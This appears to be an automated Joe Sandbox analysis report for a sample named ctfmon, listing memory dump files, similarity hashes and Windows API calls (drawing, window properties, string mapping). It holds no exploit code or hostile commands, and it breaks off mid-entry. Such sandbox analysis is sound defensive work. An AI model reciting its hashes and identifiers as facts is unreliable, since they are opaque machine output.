        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClipboardFormatRegister
        • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
        • API String ID: 1228543026-2889995556
        • Opcode ID: de80afb32674536e2f79b8ce14739d9050ed71d11b05ead950d31be3d13239dd
        • Instruction ID: edf7ca49e2a083f5ac172aeb54de25137a50422174a6044775e6e6b14afce90a
        • Opcode Fuzzy Hash: de80afb32674536e2f79b8ce14739d9050ed71d11b05ead950d31be3d13239dd
        • Instruction Fuzzy Hash: 5C017970B407A45ACB30BF73AC0995BBEE0EEC4B113A24D2FE48597690D6BCA505CF49
        APIs
          • Part of subcall function 0041C550: SetBkColor.GDI32(?), ref: 0041C56D
          • Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5BA
          • Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5E9
          • Part of subcall function 0041C550: SetBkColor.GDI32(?,?), ref: 0041C607
          • Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C632
          • Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C66C
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041E082
        • IsWindowEnabled.USER32(?), ref: 0041E095
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041E0BC
        • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0D3
        • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0EC
        • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E104
        • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E11E
        • SelectObject.GDI32(?,?), ref: 0041E143
        • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E167
        • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E187
        • SelectObject.GDI32(?,?), ref: 0041E19D
        • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 0041E1CB
        • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 0041E1EC
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041E202
        • SelectObject.GDI32(?,?), ref: 0041E21C
        • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 0041E244
        • IsWindowEnabled.USER32(?), ref: 0041E24F
        • SetTextColor.GDI32(?,?), ref: 0041E260
        • OffsetRect.USER32(?,00000001,00000001), ref: 0041E2EC
          • Part of subcall function 0041C550: SetBkColor.GDI32(?,00000000), ref: 0041C674
        • DrawTextA.USER32(?,?,?,?,00000020), ref: 0041E324
        • GetFocus.USER32 ref: 0041E330
        • InflateRect.USER32(?,00000001,00000001), ref: 0041E341
        • IntersectRect.USER32(?,?,?), ref: 0041E352
        • DrawFocusRect.USER32(?,?), ref: 0041E35E
        • SelectObject.GDI32(?,00000000), ref: 0041E371
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
        • String ID:
        • API String ID: 1611134597-0
        • Opcode ID: 1e5e9eaf120bb633d1c9d9fb497bf02f089c8a9b78752c289a9debf72a5f20d4
        • Instruction ID: 85d4594a04ea0c67e496ada25f94dcfd0f64e3c57ddc0f24227d28b8a825e15f
        • Opcode Fuzzy Hash: 1e5e9eaf120bb633d1c9d9fb497bf02f089c8a9b78752c289a9debf72a5f20d4
        • Instruction Fuzzy Hash: CBB13875208201AFD310DFA9CD84EAFB7E8FB88708F404A18FA59D2290D775E9858B56
        APIs
        • GetPropA.USER32(?,?), ref: 0041E915
        • CallWindowProcA.USER32(00000000), ref: 0041E93D
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID:
        • API String ID: 2276450057-0
        • Opcode ID: 8efb85a8f10c788bd4c9a0c68f31e7385fb8732264289b1c17e18871f870bad8
        • Instruction ID: 661fead8de9f1cb923f226e17cd232b8dad460699d7947674ae0cd3bb86e6aba
        • Opcode Fuzzy Hash: 8efb85a8f10c788bd4c9a0c68f31e7385fb8732264289b1c17e18871f870bad8
        • Instruction Fuzzy Hash: A361487A7443146BD230AB15EC84FFF375CEF86361F500122FE0092391DA29A98686BE
        APIs
        • GetModuleHandleW.KERNEL32(USER32,?,?,?,00405BA6), ref: 00405A8F
        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405AA7
        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405AB8
        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00405AC9
        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00405ADA
        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00405AEB
        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00405AFC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: EnumDisplayMonitors$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
        • API String ID: 667068680-2547861404
        • Opcode ID: 441ffe43333a6545924900e7a1cc69255c0b587673d07ec35cb38ca00c6c66c5
        • Instruction ID: 86978abfdab4202489ccb7ed7906514a54c6f7a5da0540c36e1280f3304fae6d
        • Opcode Fuzzy Hash: 441ffe43333a6545924900e7a1cc69255c0b587673d07ec35cb38ca00c6c66c5
        • Instruction Fuzzy Hash: 88110070B10611DBC7515F69BCC3A6BBAF4B6987503A40C3FE109E23D0D778684AEE69
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Focus$MessageParentStateWindow$BeepDialogH_prologItemNext
        • String ID:
        • API String ID: 1894107442-0
        • Opcode ID: 31fd434e58604c9b627ab793c01358e0faa122505644811c941e93cf9aaf4d9d
        • Instruction ID: 03bd421b11a5e9202270e7a8080601ea4524ec8c7accc3ec12f88eb2ceb1b5eb
        • Opcode Fuzzy Hash: 31fd434e58604c9b627ab793c01358e0faa122505644811c941e93cf9aaf4d9d
        • Instruction Fuzzy Hash: C8A1AF71A00219DACF24AB65D8C5BBF7B65EF04355F54423BE801B72E1C738DC429AAD
        APIs
        • EnterCriticalSection.KERNEL32(00540EE0,76944920,7622B510,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D237
        • GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 0041D260
        • lstrcmpiA.KERNEL32(?,kanji), ref: 0041D272
        • GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 0041D295
        • lstrcmpiA.KERNEL32(?,hangeul), ref: 0041D2A1
        • LeaveCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D2B3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
        • String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
        • API String ID: 1105401458-111014456
        • Opcode ID: 60bf6964cc79a83cbd7df94c004cbf816ff3b48919ba2be90905dd6c73289552
        • Instruction ID: 4abe76d66403d63afbfbe3d47ea13df97799fd1973407ab64f2f1cd089386a62
        • Opcode Fuzzy Hash: 60bf6964cc79a83cbd7df94c004cbf816ff3b48919ba2be90905dd6c73289552
        • Instruction Fuzzy Hash: E201FC757443857AD210E765EC87FEA3F489769B48F212066F900B2192D2B840588BEE
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: H_prologlstrlen
        • String ID: `DvP?Dv
        • API String ID: 2133942097-2995021381
        • Opcode ID: 01c58e14bb4e93372598d57a4fe51dd16b9f4830cd3f4e6c793004653f3c11c2
        • Instruction ID: 50e1f89d1f17318e9a9081ba82e25bfcf0167d2f1df0f58284690d34baa27448
        • Opcode Fuzzy Hash: 01c58e14bb4e93372598d57a4fe51dd16b9f4830cd3f4e6c793004653f3c11c2
        • Instruction Fuzzy Hash: DAD1C371E00219DFDF11DF94E980AAEBBB1FF44314F64452AE801A7351D738A961CB5A
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
        • String ID: edit
        • API String ID: 4088303749-2167791130
        • Opcode ID: 1597239a4afc941c1085c894db732b3d1dba95b61e2187320e04733356a35fc6
        • Instruction ID: 0ff93033a9c459ba712771479cdbba0860af532220081132ab32d03344424365
        • Opcode Fuzzy Hash: 1597239a4afc941c1085c894db732b3d1dba95b61e2187320e04733356a35fc6
        • Instruction Fuzzy Hash: B721816A2015267A9360BB789C40FFF229CAE5EB44B405421FD14C1250F728DA8B8BBD
        APIs
        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 0041F704
        • GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 0041F710
        • EnterCriticalSection.KERNEL32(00540EE0), ref: 0041F72C
        • GetVersion.KERNEL32 ref: 0041F73E
        • GetSystemMetrics.USER32(00000007), ref: 0041F782
        • GetSystemMetrics.USER32(00000008), ref: 0041F78C
        • GetSystemMetrics.USER32(00000004), ref: 0041F796
        • GetSystemMetrics.USER32(0000001E), ref: 0041F79F
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041F7AB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
        • String ID: DisableThreadLibraryCalls$KERNEL32.DLL
        • API String ID: 1414939872-3863293605
        • Opcode ID: e3aa8b7d68d2a924411618861676c163313d584acc5e2ea4edb0b14968c04ba3
        • Instruction ID: 1b76817333bc6af864855b7e5f9623894a9456d6f1598ca0c8fea5307d477cc5
        • Opcode Fuzzy Hash: e3aa8b7d68d2a924411618861676c163313d584acc5e2ea4edb0b14968c04ba3
        • Instruction Fuzzy Hash: 31112078950315AAD720AB60AC496CE3F60FF05348F50543AEA00972F0D779848EDF8E
        APIs
        • LCMapStringW.KERNEL32(00000000,00000100,0042F1F8,00000001,00000000,00000000,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 00412372
        • LCMapStringA.KERNEL32(00000000,00000100,0042F1F4,00000001,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041238E
        • LCMapStringA.KERNEL32(?,?,?,qhA,?,?,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 004123D7
        • MultiByteToWideChar.KERNEL32(?,?,?,qhA,00000000,00000000,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 0041240F
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412467
        • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041247D
        • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00416871,?,?,?,00000000,00000001), ref: 004124B0
        • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412518
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$ByteCharMultiWide
        • String ID: qhA
        • API String ID: 352835431-109923292
        • Opcode ID: 9b5ad6b26a613f15ee88acef6ac07d595746195d4a2bcaefb84c6f805b6936c2
        • Instruction ID: 022544586a59cc1c19d10a42de7e4e70b0ca33dfdf838dda5653db0c0489c209
        • Opcode Fuzzy Hash: 9b5ad6b26a613f15ee88acef6ac07d595746195d4a2bcaefb84c6f805b6936c2
        • Instruction Fuzzy Hash: 28517E31A00209FFCF218F54DE45EEF7BB5FB49750F50412AF914A1260D37989A1DB69
        APIs
        • GetPropA.USER32(?,?), ref: 0041F0B4
        • CallWindowProcA.USER32(00000000), ref: 0041F0D9
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID:
        • API String ID: 2276450057-0
        • Opcode ID: 5a95a9b41c8fc2d37364fe1a2b04355123226dd158324cccf79beebb18d5b243
        • Instruction ID: f1e4040e56493d437ac46db905cae456868ac3245465abe7b0ffa80cda6678ad
        • Opcode Fuzzy Hash: 5a95a9b41c8fc2d37364fe1a2b04355123226dd158324cccf79beebb18d5b243
        • Instruction Fuzzy Hash: ED518076A04200BFD220EB55DCC4DBFB7B8EBC9715F54442EF94583251E239AC8A87A6
        APIs
        • GetWindowLongA.USER32(?,000000F0), ref: 0041F40E
        • GetClientRect.USER32(?,?), ref: 0041F429
        • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041F45B
        • SelectObject.GDI32(?,00000000), ref: 0041F469
        • SetBkMode.GDI32(?,00000002), ref: 0041F47A
        • GetParent.USER32(?), ref: 0041F488
        • SendMessageA.USER32(00000000), ref: 0041F48F
        • SelectObject.GDI32(?,00000000), ref: 0041F499
        • SelectObject.GDI32(?,00000000), ref: 0041F4BB
        • SelectObject.GDI32(?,00000000), ref: 0041F4CB
        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0041F522
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
        • String ID:
        • API String ID: 3606012576-0
        • Opcode ID: f7fa03efbb0a66176dc49cc41372e7cbe411cfa1cfd8160426a7a43753d65c69
        • Instruction ID: e1acb393bdb105ea5047fdd93fdf0929f10e42051cf65a82c9b5611acde4adff
        • Opcode Fuzzy Hash: f7fa03efbb0a66176dc49cc41372e7cbe411cfa1cfd8160426a7a43753d65c69
        • Instruction Fuzzy Hash: 72413F722443017BD210AB58AC86FBF736CEBC5B14F84053DF70196192D759E90B87BA
        APIs
        • GetWindowLongA.USER32(?,000000FC), ref: 0041CB8D
        • RemovePropA.USER32(?,?), ref: 0041CBC3
        • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041CBC9
        • RemovePropA.USER32(?,?), ref: 0041CBF7
        • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041CBFD
        • GetWindow.USER32(?,00000005), ref: 0041CC52
        • GetWindow.USER32(00000000,00000002), ref: 0041CC63
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Long$PropRemove
        • String ID:
        • API String ID: 3256693057-0
        • Opcode ID: 36df50be8ca3e0aa6a92018f1b9fdc3f7e6f4b5b25b034851e1aae027e5d082a
        • Instruction ID: 793464c1ab96f3f28d4b13fd69ea8cc3b37c752f7a31a6ea227274fee3499300
        • Opcode Fuzzy Hash: 36df50be8ca3e0aa6a92018f1b9fdc3f7e6f4b5b25b034851e1aae027e5d082a
        • Instruction Fuzzy Hash: 7821067A2440257AC3216778BC80DFF228CDB9A368B110136FA04D2290FB29ECC747BD
        APIs
        • __EH_prolog.LIBCMT ref: 00405777
        • MapDialogRect.USER32(?,?), ref: 004057FD
        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0040581E
        • CLSIDFromString.OLE32(0000FFFC,?), ref: 00405909
        • CLSIDFromProgID.OLE32(0000FFFC,?), ref: 00405911
        • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 004059AD
        • SysFreeString.OLEAUT32(?), ref: 00405A00
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
        • String ID: `DvP?Dv
        • API String ID: 493809305-2995021381
        • Opcode ID: 76058ddd35c64321db0c5c4c9e8bc567c32fe2d22cfa7dfe102f258be5c60066
        • Instruction ID: ddfec87cd7aa1e3dc79061aa66cd0129ae2a5a4b187d7cfc1545594e6d37e31f
        • Opcode Fuzzy Hash: 76058ddd35c64321db0c5c4c9e8bc567c32fe2d22cfa7dfe102f258be5c60066
        • Instruction Fuzzy Hash: F3A1197190061ADFCB10DFA9D984AEEBBB4FF08304F14813EE815A7290D7749A55CFA9
        APIs
        • GetStringTypeW.KERNEL32(00000001,0042F1F8,00000001,@,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CB0
        • GetStringTypeA.KERNEL32(00000000,00000001,0042F1F4,00000001,@,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CCA
        • GetStringTypeW.KERNEL32(00000100,?,00407093,00000008,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CF1
        • WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D24
        • WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D8D
        • GetStringTypeA.KERNEL32(@,00000100,?,?,?,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415DF8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
